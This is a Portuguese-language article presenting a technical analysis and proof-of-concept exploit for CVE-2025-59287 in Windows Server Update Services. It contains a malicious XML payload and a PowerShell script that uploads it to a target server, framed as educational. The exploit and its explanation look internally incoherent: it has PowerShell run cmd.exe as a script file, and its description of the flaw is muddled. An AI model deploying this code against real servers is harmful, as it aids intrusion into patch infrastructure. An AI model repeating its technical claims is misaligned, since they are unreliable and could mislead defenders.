
Análise técnica e exploit de prova de conceito para CVE-2025-59287, uma RCE crítica no Windows Server Update Services por meio de desserialização insegura, incluindo builds afetados e etapas de mitigação.
O CVE-2025-59287 é uma vulnerabilidade crítica de RCE no Windows Server Update Services (WSUS) causada pela desserialização insegura de dados não confiáveis. Ela permite que atacantes remotos executem código arbitrário sem autenticação. A aplicação urgente de patches é recomendada devido à exploração ativa.
CVE‑2025‑59287 – Uma Ameaça de Execução Remota de Código no Windows Server Update Services (WSUS)
Por Mark Mallia
O Windows Server Update Services (WSUS) da Microsoft é a espinha dorsal do gerenciamento de patches para todas as plataformas Microsoft Windows Server. Ele recupera atualizações do catálogo de atualizações da Microsoft, valida-as e as envia para todos os servidores em uma rede. A vulnerabilidade identificada como CVE‑2025‑59287 explora uma rotina de desserialização insegura dentro do WSUS que permite que um atacante injete conteúdo XML arbitrário no feed de atualizações. Como o WSUS processa o payload sem nenhuma validação do caminho de origem ou dos dados de comando, um atacante pode fornecer qualquer nome de arquivo e caminho, causando uma execução remota completa de código no servidor de destino.
Por que isso importa:
| Versão do Produto | Builds Afetados |
|---|---|
| Windows Server 2012 | 6.2.9200.0 – < 6.2.9200.25728 |
| Windows Server 2012 R2 | 6.3.9600.0 – < 6.3.9600.22826 |
| Windows Server 2016 | 10.0.14393.0 – < 10.0.14393.8524 |
| Windows Server 2019 | 10.0.17763.0 – < 10.0.17763.7922 |
| Windows Server 2022 | 10.0.20348.0 – < 10.0.20348.4297 |
| Windows Server 2025 | 10.0.26100.0 – < 10.0.26100.6905 |
| Windows Server 23H2 | 10.0.25398.0 – < 10.0.25398.1916 |
(Se o seu ambiente usar um build de patch diferente, basta ajustar o intervalo de acordo.)
System.Xml.Linq.XElement.<SourcePath>; esse valor é gravado no disco como um caminho absoluto.<Command> é executado pelo PowerShell quando o WSUS processa o stream, fornecendo uma execução remota completa de código.Abaixo está o payload XML que enviaremos para um servidor vulnerável.
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
<Metadata>
<Title>WSUS Exploit</Title>
<Description>Injected by local attacker.</Description>
</Metadata>
<SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
<Command><![CDATA[
powershell -NoProfile -ExecutionPolicy Bypass `
-File C:\Windows\System32\cmd.exe
]]></Command>
</UpdateStream>
O script a seguir gerará o payload XML, o enviará via HTTP PUT para sua instância do WSUS e deixará um arquivo de log para solução de problemas.
# --------------------------------------------------
# File: wsus‑exploit.ps1
# Purpose: Generate malicious UpdateStream.xml,
# upload it to the WSUS server,
# trigger the feed.
# --------------------------------------------------
param (
[string]$TargetUrl = 'http://wsus.example.com/UpdateStream.xml',
[int] $Port = 80,
[string] $XmlFile = '.\payload.xml'
)
function Build-Xml {
param ([string]$file)
$xmlContent = @"
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
<Metadata>
<Title>WSUS exploit</Title>
<Description>Injected by local attacker.</Description>
</Metadata>
<SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
<Command><![CDATA[
powershell -NoProfile -ExecutionPolicy Bypass `
-File C:\Windows\System32\cmd.exe
]]></Command>
</UpdateStream>
"@
Set-Content -Path $file -Value $xmlContent
}
# Build the XML payload
Build-Xml -file $XmlFile
# Upload via HTTP PUT
Invoke-WebRequest -Uri $TargetUrl `
-Method Put `
-InFile $XmlFile `
-OutFile 'upload.log'
Write-Host "Upload complete – WSUS should now process the stream."
winver.exe em cada Windows Server para confirmar se o build está dentro dos intervalos acima.wsus‑exploit.ps1 para uma máquina que possa acessar sua instância do WSUS, modifique $TargetUrl se você usar um caminho ou porta diferente.C:\Windows\System32\cmd.exe aparece em cada servidor de destino e se contém o payload esperado.As informações e o código de exploit fornecidos aqui são apenas para fins educacionais. Certifique-se de ter permissão para executar este teste contra seu próprio ambiente WSUS e siga todas as diretrizes aplicáveis de melhores práticas de segurança ao implantar alterações em sistemas de produção.